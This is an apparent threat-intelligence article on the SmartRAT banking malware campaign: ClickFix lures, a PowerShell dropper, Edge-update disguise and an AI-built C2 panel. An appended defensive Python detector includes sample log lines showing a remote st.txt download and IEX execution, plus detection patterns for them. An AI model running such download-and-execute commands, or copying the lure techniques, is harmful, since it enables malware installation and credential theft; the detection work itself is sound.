A recently uncovered attack campaign uses phishing pages and PowerShell to deploy a malware strain known as SmartRAT. It primarily targets Brazilian bank customers, combining social engineering with AI-generated web pages to make the lure more convincing.
Targeting Brazilian Banks with AI-Powered Tools
The malicious actors have constructed a counterfeit website emulating a prominent Brazilian bank. This site includes a seemingly authentic credit card application and a deceptive security check prompt. Users who engage with the page are inadvertently coaxed into executing a malicious PowerShell command, which subsequently downloads and installs SmartRAT on their systems.
The malware is capable of logging keystrokes, capturing screenshots, intercepting QR codes, and displaying fake full-screen banking forms to harvest user credentials. Analysts at Zscaler ThreatLabz, who identified this threat in March 2026, reported that the fraudulent site was likely created using AI-driven website generation tools. The page source revealed AI-generated code indicators, such as templated comments and automated structuring.
Innovative Deception Techniques
This campaign is particularly dangerous due to its multi-layered deception tactics. Initially, the phishing page presents a fake Cloudflare CAPTCHA, followed by a simulated Blue Screen of Death to induce panic and compel users to follow instructions. This method, termed ClickFix, tricks users into believing their system has crashed and that executing a specific command is the only solution.
SmartRAT, a comprehensive remote access tool written in PowerShell, allows attackers to monitor browser activity for banking interactions. Once a victim accesses a financial site or app, the attacker can manipulate the screen, inject keystrokes, block input, and steal entered data.
Exploiting PowerShell for Malware Deployment
The infection process begins when a victim unknowingly pastes a PowerShell command into the Windows Run dialog, which has been secretly inserted into their clipboard by the attack page. This command connects to a remote server to download a file named st.txt, serving as a covert dropper that retrieves an encrypted PowerShell script, ultimately executing SmartRAT.
SmartRAT conceals its presence by disguising its files and tasks as Microsoft Edge updates, blending in with legitimate Windows processes. It seeks to escalate privileges by requesting UAC approval and, if granted, installs itself as a Windows service with SYSTEM-level access. Even if denied, it persists through hidden processes and registry entries.
AI-Driven Infrastructure and Security Flaws
Researchers also discovered that the attackers utilized AI tools to build their command-and-control (C2) panel, which manages infected systems. The panel’s security was weak, with a client-side login system that could be bypassed easily. This vulnerability suggests the code was developed rapidly and without thorough review, likely with AI assistance.
The C2 panel, branded MyGood PRO, provides attackers with real-time control over infected machines, including screen streaming and the ability to alter banking QR codes. The operation targets numerous Brazilian financial institutions, indicating a focused and well-funded campaign.
To safeguard against such threats, users should be wary of websites that prompt them to paste commands into their systems, even if they appear to be legitimate bank or security prompts. Organizations are advised to monitor unusual PowerShell activity, unexpected tasks, and connections to unknown IP addresses. Employing endpoint protection tools that detect script-based threats remains crucial in defending against attacks like SmartRAT.
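The monitoring advice above can be turned into a small triage check. The following is an added example, not code from the article or from Zscaler: it runs a few rules over constructed log lines (a simplified `timestamp|source|message` export of PowerShell script-block events and scheduled-task creations; the task names, paths and the 203.0.113.7 address are invented placeholders) and flags the behaviours the article describes: a dropper fetched as a `.txt` file, script execution via `IEX`, and an "Edge update" task whose action lives outside Program Files.

```python
import re

# Constructed sample events (assumption: a SIEM export in the form
# timestamp|source|message; PS-4104 = PowerShell script-block text,
# TASK-CREATE = scheduled-task creation). Not real captured data.
SAMPLE_EVENTS = [
    "2026-03-02T10:01:05|PS-4104|Get-ChildItem C:\\Users\\ana\\Documents",
    "2026-03-02T10:02:11|PS-4104|Invoke-WebRequest -Uri http://203.0.113.7/st.txt -UseBasicParsing",
    "2026-03-02T10:02:13|PS-4104|IEX ([IO.File]::ReadAllText('C:\\Users\\Public\\update.ps1'))",
    "2026-03-02T10:03:40|TASK-CREATE|TaskName=MicrosoftEdgeUpdateTaskCore Action=C:\\Users\\Public\\msedge\\update.ps1",
    "2026-03-02T10:03:41|TASK-CREATE|TaskName=MicrosoftEdgeUpdateTaskMachineUA Action=C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe",
]

# Rules over the message field of PowerShell script-block events. They mirror
# the reported chain: a text file pulled from a remote host, then a script
# run with Invoke-Expression. Rule names are our own labels.
PS_RULES = [
    ("ps_download_txt_script",
     re.compile(r"(Invoke-WebRequest|iwr|DownloadString|Net\.WebClient).*\.txt", re.I)),
    ("ps_iex_from_file", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)),
]

# Edge-update lookalike check: a task whose name mentions Edge but whose
# action is not under the Program Files directories where the real updater lives.
EDGE_TASK = re.compile(r"TaskName=(?P<name>\S*Edge\S*)\s+Action=(?P<path>.+)$", re.I)
LEGIT_EDGE_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")


def classify(event: str) -> list[str]:
    """Return the names of every rule that fires on a single event line."""
    _ts, source, msg = event.split("|", 2)
    hits = []
    if source == "PS-4104":
        hits += [name for name, rx in PS_RULES if rx.search(msg)]
    elif source == "TASK-CREATE":
        m = EDGE_TASK.search(msg)
        if m and not m.group("path").lower().startswith(LEGIT_EDGE_DIRS):
            hits.append("edge_update_task_outside_program_files")
    return hits


def scan(events: list[str]) -> dict[str, list[str]]:
    """Map each suspicious event to its rule hits; clean events are dropped."""
    findings = {}
    for event in events:
        hits = classify(event)
        if hits:
            findings[event] = hits
    return findings


if __name__ == "__main__":
    for event, hits in scan(SAMPLE_EVENTS).items():
        print(f"{', '.join(hits):45s} {event}")
```

Path allow-listing alone is coarse; in production, pair the task check with the signer of the action binary and the account that registered the task.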
